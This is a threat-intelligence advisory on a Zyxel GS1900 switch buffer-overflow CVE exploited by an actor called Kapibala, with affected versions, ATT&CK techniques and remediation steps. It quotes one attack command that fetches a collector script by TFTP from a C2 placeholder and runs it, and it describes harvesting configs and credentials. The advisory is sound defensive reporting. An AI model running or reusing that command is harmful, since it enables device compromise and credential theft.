Zyxel GS1900 Series Switches Stack-Based Buffer Overflow (CVE-2026-7273) Actively Exploited by Kapibala/Red Heron in Global 996-Device Campaign — Added to CISA KEV

Zyxel GS1900 Series Switches Stack-Based Buffer Overflow (TL-2026-2611), also tracked as Open Season on Kapibala, is a critical-severity software vulnerability scored CVSS 8.8, first published 2026-09-21. It is attributed to Kapibala (China) with low confidence, affects Zyxel GS1900-8, references 1 CVE (CVE-2026-7273), maps to 10 MITRE ATT&CK techniques (T1005, T1027.002, T1059.004), and is covered by 9 detection rules and 11 indicators of compromise.

Key facts for TL-2026-2611

Threat ID
TL-2026-2611
Also known as
Open Season on Kapibala
Severity
CRITICAL
CVSS
8.8 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Status
ACTIVE
Category
VULNERABILITY
First published
2026-09-21
Last reviewed
2026-09-21
Attribution
Kapibala
Attribution confidence
LOW
Nation-state nexus
China
Motivation
ESPIONAGE
Target sectors
networkinfrastructure, smallbusiness, government administration
Target regions
Global, Europe, North America, East Asia
Detection rules
9
Indicators of compromise
11

Malware and tooling in Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

Malware and tooling: Kapibala CVE-2026-7273 Python exploit script, PyArmor 6.7.5

CISA added CVE-2026-7273, an unauthenticated stack-based buffer overflow in the CGI program of Zyxel GS1900 series Smart Managed Switches, to its KEV catalog after GreyNoise documented a China-nexus actor tracked as "Kapibala" (possibly linked to Red Heron) using a PyArmor-obfuscated pre-auth exploit to compromise 996 switches across 48 countries and exfiltrate device configs and hashed root credentials via TFTP.

How Zyxel GS1900 Series Switches Stack-Based Buffer Overflow works

CVE-2026-7273 is a stack-based buffer overflow (CWE-121) in the CGI program of Zyxel's GS1900 series Smart Managed Switch firmware. Because the CGI handler fails to bound-check user-supplied input before copying it into a fixed-size stack buffer, a LAN-adjacent, unauthenticated attacker can send a single crafted HTTP request to overwrite the stack and redirect execution, ultimately achieving OS command execution on the switch (NVD CVSS 3.1: 8.8, AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Zyxel published a fix on 2026-06-16 for ten affected GS1900 models (firmware 2.10 through 2.90 depending on model), crediting five ISCAS researchers with responsible disclosure.

On 2026-09-21, GreyNoise's "Open Season on Kapibala" report disclosed that this vulnerability had been actively and successfully exploited in the wild as one component of a broader multi-CVE campaign (also touching WordPress, Gitea, UniFi OS, FlowiseAI, SENAITE LIMS, Nuclio, Proxmox VE, and the Linux kernel Dirty Pipe flaw) attributed to a cluster GreyNoise tracks as "Kapibala," assessed with low-to-moderate confidence as Chinese-speaking (UTC+8 operational tempo) and possibly identical to or affiliated with the previously documented actor "Red Heron" (Acronis, 2026-09-13), which separately weaponized a Gitea RCE (CVE-2026-60004) to deploy a Linux implant with an LD_PRELOAD rootkit. For the Zyxel sub-campaign specifically, the actor used a Python exploit script — packed with PyArmor 6.7.5 to hinder analysis — that supports command-line targeting of multiple GS1900 firmware variants across the 2.10-2.90 range. On successful exploitation the device is instructed to run `tftp -gr c -l /1 <C2> 6969;/bin/sh /1`, pulling a collector script named `c` over TFTP on a non-standard port (6969) and executing it via `/bin/sh`. The collector harvests the switch's running configuration, hashed root-level credentials, and networking information into `/tmp/info`, which is then staged to `/home/web/tmp/info.txt` ahead of exfiltration.

GreyNoise telemetry attributes 996 compromised GS1900 switches across 48 countries to this campaign, led by Italy (133), the United States (129), Taiwan (123), France (90), and South Korea (69). Notably, 564 of the 996 compromised devices (57%) were reached via unrotated factory-default administrative credentials rather than the CVE-2026-7273 exploit chain itself, indicating the actor is opportunistically combining a novel pre-auth RCE with basic credential-stuffing against exposed management interfaces. As switches sit at the network edge and grant "total control of the asset post-exploitation" per CISA, successful compromise enables traffic interception, lateral pivoting into the broader LAN, configuration tampering, and persistent access to the wider network the switch serves. CISA added CVE-2026-7273 to the KEV catalog on 2026-09-21 under BOD 26-04, with a federal remediation due date of 2026-09-24; agencies are also required to determine whether compromise occurred prior to patching.

MITRE ATT&CK techniques used in TL-2026-2611

Collection

T1005 Data from Local System

Defense Evasion

T1027.002 Software Packing

Execution

T1059.004 Unix Shell

Command and Control

T1071.002 File Transfer Protocols; T1571 Non-Standard Port

Initial Access

T1078.001 Default Accounts; T1190 Exploit Public-Facing Application

Credential Access

T1552.001 Credentials In Files

Resource Development

T1588.002 Tool

Reconnaissance

T1595.002 Vulnerability Scanning

Affected products and versions in Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

  • Zyxel — GS1900-8
    Vulnerable versions: 2.90(AAHH.1)C0 and earlier
    Fixed in: 2.90(AAHH.2)C0
  • Zyxel — GS1900-8HP
    Vulnerable versions: 2.90(AAHI.1)C0 and earlier
    Fixed in: 2.90(AAHI.2)C0
  • Zyxel — GS1900-10HP
    Vulnerable versions: 2.90(AAZI.1)C0 and earlier
    Fixed in: 2.90(AAZI.2)C0
  • Zyxel — GS1900-16
    Vulnerable versions: 2.90(AAHJ.1)C0 and earlier
    Fixed in: 2.90(AAHJ.2)C0
  • Zyxel — GS1900-24
    Vulnerable versions: 2.90(AAHL.1)C0 and earlier
    Fixed in: 2.90(AAHL.2)C0
  • Zyxel — GS1900-24E
    Vulnerable versions: 2.90(AAHK.1)C0 and earlier
    Fixed in: 2.90(AAHK.2)C0
  • Zyxel — GS1900-24EP
    Vulnerable versions: 2.90(ABTO.1)C0 and earlier
    Fixed in: 2.90(ABTO.2)C0
  • Zyxel — GS1900-24HPv2
    Vulnerable versions: 2.90(ABTP.1)C0 and earlier
    Fixed in: 2.90(ABTP.2)C0
  • Zyxel — GS1900-48
    Vulnerable versions: 2.90(AAHN.1)C0 and earlier
    Fixed in: 2.90(AAHN.2)C0
  • Zyxel — GS1900-48HPv2
    Vulnerable versions: 2.90(ABTQ.1)C0 and earlier
    Fixed in: 2.90(ABTQ.2)C0

Remediation for Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

Patches

  • Upgrade to the fixed firmware release for each affected model (e.g., GS1900-8: 2.90(AAHH.2)C0; GS1900-48HPv2: 2.90(ABTQ.2)C0) per Zyxel's 2026-06-16 advisory

Immediate actions

  • Identify all Zyxel GS1900 series switches on the network and confirm exact model/firmware version against Zyxel's affected list
  • Restrict or disable the web/CGI management interface from LAN and WAN access wherever it is not strictly required
  • Immediately rotate factory-default administrative credentials on every GS1900 device — 57% of confirmed compromises in this campaign used unrotated default logins
  • Review switch configuration and account state for signs of prior compromise before applying patches, per BOD 26-04 forensic-triage guidance
  • Block outbound TFTP (UDP/69 and non-standard ports such as 6969) from network device management VLANs where not required

Workarounds

  • If patching cannot occur immediately, disable remote/WAN administration and restrict CGI/web-management access to a trusted management network only

Longer-term hardening

  • Segment network management interfaces (switches, APs, IoT/embedded devices) onto a dedicated, access-controlled management VLAN isolated from general LAN traffic
  • Deploy network-level monitoring/IDS capable of detecting anomalous outbound TFTP and shell-invocation patterns from network infrastructure devices
  • Establish a firmware patch-management and default-credential-rotation process for SMB/embedded network gear, which frequently lacks EDR coverage

CVEs associated with Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

CVE-2026-7273

Weaknesses (CWE) in Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

CWE-121

Timeline of Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

  • GreyNoise-tracked 'Kapibala' campaign begins its June-September 2026 multi-technology exploitation spree, later found to include GS1900 switch targeting.
  • NVD publishes CVE-2026-7273 with CVSS 3.1 base score 8.8 (AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and CWE-121 classification.
  • Zyxel publishes security advisory and fixed firmware for CVE-2026-7273 across ten GS1900 series switch models, crediting five ISCAS researchers for responsible disclosure.
  • Acronis TRU publishes research on 'Red Heron,' a Chinese-speaking actor GreyNoise later assesses may be linked to or identical with Kapibala, documenting its exploitation of a separate Gitea RCE (CVE-2026-60004).
  • CISA adds CVE-2026-7273 to the Known Exploited Vulnerabilities catalog based on evidence of active exploitation, per BOD 26-04.
  • GreyNoise publishes 'Open Season on Kapibala,' disclosing that CVE-2026-7273 was actively exploited via a PyArmor-obfuscated exploit, compromising 996 GS1900 switches across 48 countries.
  • BOD 26-04 remediation due date for U.S. federal civilian agencies to patch or mitigate CVE-2026-7273.

Sources cited for Zyxel GS1900 Series Switches Stack-Based Buffer Overflow

More in vulnerability

Detection coverage for TL-2026-2611

As of 2026-09-21, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2611 across Splunk SPL, Microsoft KQL and Sigma, covering 11 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Latest Threats